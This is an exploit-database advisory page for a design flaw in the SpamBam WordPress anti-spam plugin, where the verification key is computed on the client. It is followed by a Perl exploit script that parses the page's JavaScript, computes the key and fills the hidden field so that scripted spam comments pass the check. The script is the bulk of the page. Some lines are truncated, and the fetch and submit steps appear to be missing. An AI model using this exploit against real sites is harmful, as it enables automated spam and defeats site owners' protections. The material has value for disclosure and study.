Suggest Exploit
Jose Palazon
Security Bypass
Product Name: SpamBam
Affected Version From:
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Patch Exists: NO
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SpamBam Security Bypass Vulnerability

The SpamBam plugin for WordPress is vulnerable to a security bypass issue. This is due to the fact that client-accessible data can be used to calculate verification keys. Attackers can exploit this vulnerability by submitting arbitrary form data via automated scripts and distribute spam.


There is no fix for this vulnerability. It is a design flaw in the SpamBam plugin.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/27291/info

SpamBam is prone to a security-bypass vulnerability because client-accessible data can be used to calculate verification keys.

Attackers can exploit this issue to submit arbitrary form data via automated scripts and distribute spam.

#!/usr/bin/perl -w

# Defeating SpamBam exploit
# by Jose Palazon (josem.palazon@gmail.com) (a.k.a. palako)

# Vulnerable software:
# SpamBam (http://wordpress.org/extend/plugins/spambam/) by Gareth Heyes

# Vulnerability:
# No matter how hard you ofuscate or encrypt your code, never, under no 
circunstances, rely
# any security aspect on the client. Never!

# How the plugin works:
# It generates a pseudo-random code both on the client and the server to 
generate a key.
# On form submit, both key values are checked and they should match to 
allow comment insertion.

#How the exploit works:
# It does nothing but acting as a client. It parses the html, extracts 
the javascript, process it
# to calculate the key and fills the hidden field with it.

# Solution:
# Sorry guys but there's no fix for this. It'ss just a design flaw.

use WWW::Mechanize;
use JavaScript::SpiderMonkey;

my $tmpContent;
my $javascriptCode;
my $spamBamKey;

die ("Usage: spambam.pl <post url> <author> <email> <comment>\n") unless 

my $url = $ARGV[0];
my $author = $ARGV[1];
my $email = $ARGV[2];
my $comment = $ARGV[3];

my $mech = WWW::Mechanize->new( autocheck => 1 );


# WWW::Mechanize doesn't support javascript, so the field 
comment_spambamKey won't be
# recognized by $mech->field. Thus, I'll make an update_html adding the 
field, and for
# this purpose I save first the original contents. Indeed, substitition 
occurs via the
# javascript callback function "extractKey"
$tmpContent = $mech->content;

# Eliminate carriage returns to apply sed. Later I'll have to restore 
# to execute the javascript code, as not every line is semicolon 
# That's the reason of the __WHO_BAMS_WHO__ string.
$_ = $mech->content;

# Extract the javascript code and the name of the variable where the key 
is going to be calculated
/<script type="text\/javascript">(.*)document\.write\('<input 
type="hidden" name="comment_spambamKey" value="'\+(.*)\+'">'\);/g; 
$javascriptCode = $1;
$spamBamKey = $2;

# Add the javascript instruction  which will comunicate the key to the 
perl code.
$javascriptCode .= "\nextractKey($spamBamKey);";

my $js = JavaScript::SpiderMonkey->new();
$js->init();  # Initialize Runtime/Context

# Define perl callback for extracting the key from the javascript code
$js->function_set("extractKey", sub { $tmpContent =~ s/<\/form>/<input 
type=\"hidden\" name=\"comment_spambamKey\" value=\"@_\"><\/form>/; });

# Restore Carriage returns and execute javascript code
$javascriptCode =~ s/__WHO_BAMS_WHO__/\n/g;
my $rc = $js->eval($javascriptCode); 

# Process form
$mech->update_html( $tmpContent );
$mech->field("author", $author);
$mech->field("email", $email);
$mech->field("comment", $comment);

printf("Check it. Comment should have been added\n");